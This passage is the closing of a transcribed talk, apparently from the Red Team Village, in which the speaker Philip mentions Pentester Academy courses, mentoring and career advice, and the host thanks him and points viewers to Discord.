Pentester Academy courses. And here's my contact information. I kind of got into teaching and presenting a conference as a way to share. I used to mentor and still do mentor a lot of people. A lot of times just answering questions and sharing resources. So this stuff's my hobby.

37:43

I live and breathe this stuff. So I'm always up to talk about this stuff, give career advice, and help out. If you have any questions, there's my contact information. Feel free to contact me. And so that concludes my presentation.

38:02

Awesome. Thank you so much, Philip. As always, you have been amazing. And thank you so much for supporting the community and the Red Team Village as well. And for those of you that are online, please join the conversation in Discord. We have the link in the bottom of the screen. So in the description, whether you are in YouTube, in Periscope, or in Twitch, please join us.